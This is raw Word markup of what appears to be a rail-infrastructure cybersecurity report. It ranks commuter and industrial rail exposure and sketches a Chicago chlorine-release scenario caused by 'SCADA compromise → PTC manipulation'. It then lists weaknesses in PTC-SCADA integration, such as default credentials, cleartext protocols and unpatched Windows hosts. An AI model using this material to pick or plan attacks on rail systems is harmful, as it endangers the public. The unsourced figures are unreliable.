              <w:t xml:space="preserve">Amtrak Northeast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820,000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Integrated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Congressional targets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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metra Chicago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280,000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Vulnerable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Urban catastrophe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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Caltrain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65,000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Legacy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Tech hub disruption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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SEPTA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350,000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Partial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Philadelphia paralysis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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metro-North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285,000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Full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NYC bedroom impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_38dy3zelje9h" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Industrial Railways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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Industry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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Integration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b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Economic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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chemical plants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2,300 facilities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Direct PLC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$340B production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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Refineries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135 locations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SCADA dependent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$450B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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Power plants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890 coal plants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Unit train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35% grid capacity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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ports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47 intermodal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Automated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$2.1T trade flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_m44ehbdkyxay" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cascading Infrastructure Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ibn9tbvst5kt" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When Safety Systems Fail</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Cascading failure diagram on dark grey (#1A1F2E). Center shows derailed hazmat train. Radiating impacts in concentric rings: Inner ring (immediate) - chlorine gas release, evacuation zone. Second ring (hours) - hospital overwhelm, traffic gridlock, cell tower overload. Third ring (days) - water system shutdown, power plant fuel shortage, supply chain breakdown. Outer ring (weeks) - economic recession, infrastructure rebuild, regulatory overhaul. Use color intensity to show severity. Include timeline markers and affected population counts.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pnov9n3sggcb" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario Analysis: Chicago Chlorine Release</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: SCADA compromise → PTC manipulation → Collision orchestrated</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T+0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Two trains collide in Chicago rail yard</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">90-ton chlorine tank cars rupture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Toxic plume forms immediately</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wind carries toward Loop</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+1 Hour</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Mass casualty event begins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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">50,000 immediate evacuations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hospitals overwhelmed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Transportation gridlocked</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+24 Hours</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: City systems collapse</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water treatment plants offline</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">O'Hare Airport closed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Financial markets disrupted</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+7 Days</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Regional crisis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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2 million displaced</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$45B economic impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">National Guard deployed</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T+30 Days</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Systemic failure</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply chains broken</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insurance crisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Congressional investigations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gvigdmfb0oqe" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical Dependencies Mapped</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Water Systems</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 40 million Americans depend on rail-delivered treatment chemicals </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Power Generation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 35% of electricity requires rail-delivered coal </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Agriculture</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: 140 million tons of grain move by rail annually </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Healthcare</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Medical supplies concentrated in rail distribution</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5peel1cb0ucg" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Integration Vulnerability Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7p5gjkv7h2rt" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Architecture Failures</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[IMAGE: Detailed technical architecture diagram on black (#0A0A0A). Show typical PTC-SCADA integration with all vulnerability points highlighted. Include: HMI workstations (Windows XP/7), OPC servers (no auth), SQL databases (injection points), protocol gateways (cleartext), message brokers (default creds), API interfaces (no rate limit). Red arrows show exploit paths. Yellow boxes show missing security controls. Include protocol details and version numbers. Add "DESIGN FLAW" stamps at critical points.]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ugcv8c35snpx" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HMI Workstations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: Windows XP SP2, Windows 7 (unpatched since 2019)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access: RDP enabled, default administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Software: Wonderware InTouch 2014, iFIX 5.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilities: 2,847 known CVEs</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA Networks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture: Flat Layer 2 network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Protocols: Modbus TCP, DNP3 (cleartext)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authentication: None or default credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption: Not implemented</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PTC Integration Points</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gateway: Single Windows server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001ED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Database: SQL Server 2008 (EOL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">API: REST over HTTP (not HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trust: Implicit from SCADA</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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Safety Logic</w:t>
      </w:r>
